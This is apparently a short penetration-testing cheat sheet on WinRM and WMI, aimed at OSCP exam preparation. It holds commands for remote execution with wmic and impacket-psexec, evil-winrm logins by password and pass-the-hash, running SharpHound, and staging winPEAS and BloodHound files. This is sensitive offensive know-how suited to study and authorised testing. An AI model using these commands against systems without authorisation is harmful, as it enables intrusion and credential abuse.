WinRM is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it’s utilising WMI, so you can think of it as an HTTP based API for WMI.
- 5985,5986 – Pentesting WinRM (HackTricks)
- Abusing Windows Remote Management (WinRM) with Metasploit (Rapid7)
WMI Client
Install WMI Client
sudo apt install wmi-clientHelp
wmiRemote commands
wmic //$IP "powershell Get-Process"wmic -U ${DOMAIN}/${USER}%${PASS} //$IP "powershell Get-Process"impacket-psexec -target-ip 10.11.1.31 "Get-Process"Bruteforce
Use Crackmapexec.
Evil-WinRm
OSCP: evil-winrm is officially allowed during the exam according to the OSCP Exam FAQ
- Evil-WinRM (GitHub)
Installation
sudo gem install winrm winrm-fs stringioUsage
IP=x.x.x.x
DOMAIN=example.com
USER=Administrator # could be any other account
PASS=somepassword
HASH=<NTLM hash> # for Pass the Hashevil-winrm -u $USER -p $PASS -i $IPevil-winrm -u $USER -H $HASH -i $IPevil-winrm -u $USER -p $PASS -i $IP -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'In evil-winrm to execute commands in cmd.exe
cmd.exe /c .\SharpHound.exeFile Transfer
Use full paths or it will not work.
upload /home/kali/share/winPEAS.bat C:\winPEAS.batdownload C:\Users\Administrator\Desktop\20220530171253_BloodHound.zip /home/kali/20220530171253_BloodHound.zip